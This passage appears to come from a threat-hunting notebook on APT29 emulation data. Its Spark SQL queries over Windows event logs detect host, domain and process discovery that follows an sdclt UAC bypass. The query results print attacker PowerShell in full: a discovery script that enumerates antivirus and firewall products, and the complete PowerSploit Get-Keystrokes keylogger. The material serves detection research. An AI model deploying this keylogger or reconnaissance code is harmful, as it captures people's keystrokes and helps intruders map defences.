    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.3. System Information Discovery

Procedure: Enumerated the computer hostname using PowerShell

Criteria: powershell.exe executing $env:COMPUTERNAME

Detection Type:Telemetry(Correlated)

Query ID:9B610803-2B27-4DA4-9AAC-C859F48510DA

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$env:computername%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID:1BA09833-CDF3-44BE-86D0-6F5B1C66D151

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$env:computername%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.4. System Network Configuration Discovery

Procedure: Enumerated the current domain name using PowerShell

Criteria: powershell.exe executing $env:USERDOMAIN

Detection Type:Telemetry(Correlated)

Query ID:1418A09E-BC90-4BC5-A0BC-1ECC4283ACF4

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$env:userdomain%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID:8D215D46-CE33-4CB7-9934-FF9205971570

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$env:userdomain%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.5. Process Discovery

Procedure: Enumerated the current process ID using PowerShell

Criteria: powershell.exe executing $PID

Detection Type:Telemetry(Correlated)

Query ID:2DBE08DB-BADD-40AD-A037-DEBD29E207C6

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$pid%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Get-Keystrokes {
<#
.SYNOPSIS
 
    Logs keys pressed, time and the active window (when changed).
    Some modifications for Empire by @harmj0y.
    
    PowerSploit Function: Get-Keystrokes
    Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
    Modifications: @harmj0y
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
    
.LINK
    http://www.obscuresec.com/
    http://www.exploit-monday.com/
#>
    Start-Job -Name "Keystrokes" -ScriptBlock {
        Write-Host "`nJobPID`n------`n$PID"
        [Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null

        try
        {
            $ImportDll = [User32]
        }
        catch
        {
            $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')
            $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
            $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)
            $TypeBuilder = $ModuleBuilder.DefineType('User32', 'Public, Class')

            $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
            $FieldArray = [Reflection.FieldInfo[]] @(
                [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
                [Runtime.InteropServices.DllImportAttribute].GetField('ExactSpelling'),
                [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'),
                [Runtime.InteropServices.DllImportAttribute].GetField('PreserveSig'),
                [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),
                [Runtime.InteropServices.DllImportAttribute].GetField('CharSet')
            )

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys]))
            $FieldValueArray = [Object[]] @(
                'GetAsyncKeyState',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetKeyboardState', 'Public, Static', [Int32], [Type[]] @([Byte[]]))
            $FieldValueArray = [Object[]] @(
                'GetKeyboardState',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32]))
            $FieldValueArray = [Object[]] @(
                'MapVirtualKey',
                $False,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('ToUnicode', 'Public, Static', [Int32],
                [Type[]] @([UInt32], [UInt32], [Byte[]], [Text.StringBuilder], [Int32], [UInt32]))
            $FieldValueArray = [Object[]] @(
                'ToUnicode',
                $False,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetForegroundWindow', 'Public, Static', [IntPtr], [Type[]] @())
            $FieldValueArray = [Object[]] @(
                'GetForegroundWindow',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $ImportDll = $TypeBuilder.CreateType()
        }

        $LastWindowTitle = ""
        $i=0
        while ($true) {
            Start-Sleep -Milliseconds 40
            $gotit = ""
            $Outout = ""
            
            for ($char = 1; $char -le 254; $char++) {
                $vkey = $char
                $gotit = $ImportDll::GetAsyncKeyState($vkey)
                
                if ($gotit -eq -32767) {

                    #check for keys not mapped by virtual keyboard
                    $LeftShift    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LShiftKey) -band 0x8000) -eq 0x8000
                    $RightShift   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RShiftKey) -band 0x8000) -eq 0x8000
                    $LeftCtrl     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LControlKey) -band 0x8000) -eq 0x8000
                    $RightCtrl    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RControlKey) -band 0x8000) -eq 0x8000
                    $LeftAlt      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LMenu) -band 0x8000) -eq 0x8000
                    $RightAlt     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RMenu) -band 0x8000) -eq 0x8000
                    $TabKey       = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Tab) -band 0x8000) -eq 0x8000
                    $SpaceBar     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Space) -band 0x8000) -eq 0x8000
                    $DeleteKey    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Delete) -band 0x8000) -eq 0x8000
                    $EnterKey     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Return) -band 0x8000) -eq 0x8000
                    $BackSpaceKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Back) -band 0x8000) -eq 0x8000
                    $LeftArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Left) -band 0x8000) -eq 0x8000
                    $RightArrow   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Right) -band 0x8000) -eq 0x8000
                    $UpArrow      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Up) -band 0x8000) -eq 0x8000
                    $DownArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Down) -band 0x8000) -eq 0x8000
                    $LeftMouse    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LButton) -band 0x8000) -eq 0x8000
                    $RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000

                    if ($LeftShift -or $RightShift) {$Outout += '[Shift]'}
                    if ($LeftCtrl  -or $RightCtrl)  {$Outout += '[Ctrl]'}
                    if ($LeftAlt   -or $RightAlt)   {$Outout += '[Alt]'}
                    if ($TabKey)       {$Outout += '[Tab]'}
                    if ($SpaceBar)     {$Outout += '[SpaceBar]'}
                    if ($DeleteKey)    {$Outout += '[Delete]'}
                    if ($EnterKey)     {$Outout += '[Enter]'}
                    if ($BackSpaceKey) {$Outout += '[Backspace]'}
                    if ($LeftArrow)    {$Outout += '[Left Arrow]'}
                    if ($RightArrow)   {$Outout += '[Right Arrow]'}
                    if ($UpArrow)      {$Outout += '[Up Arrow]'}
                    if ($DownArrow)    {$Outout += '[Down Arrow]'}
                    if ($LeftMouse)    {$Outout += '[Left Mouse]'}
                    if ($RightMouse)   {$Outout += '[Right Mouse]'}

                    #check for capslock
                    if ([Console]::CapsLock) {$Outout += '[Caps Lock]'}

                    $scancode = $ImportDll::MapVirtualKey($vkey, 0x3)
                    
                    $kbstate = New-Object Byte[] 256
                    $checkkbstate = $ImportDll::GetKeyboardState($kbstate)
                    
                    $mychar = New-Object -TypeName "System.Text.StringBuilder";
                    $unicode_res = $ImportDll::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)

                    #get the title of the foreground window
                    $TopWindow = $ImportDll::GetForegroundWindow()
                    $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
                    
                    if ($unicode_res -gt 0) {
                        if ($WindowTitle -ne $LastWindowTitle){
                            # if the window has changed
                            $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
                            $Outout = "`n`n$WindowTitle - $TimeStamp`n"
                            $LastWindowTitle = $WindowTitle
                        }
                        $Outout += $mychar.ToString()
                        $Outout
                    }
                }
            }
        }
    }
}

ScriptBlock ID: fa9f2b3a-3f5e-4d3c-93c9-7172cc073add
Path: C:\Program Files\SysinternalsSuite\psversion.ps1 
-RECORD 1-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------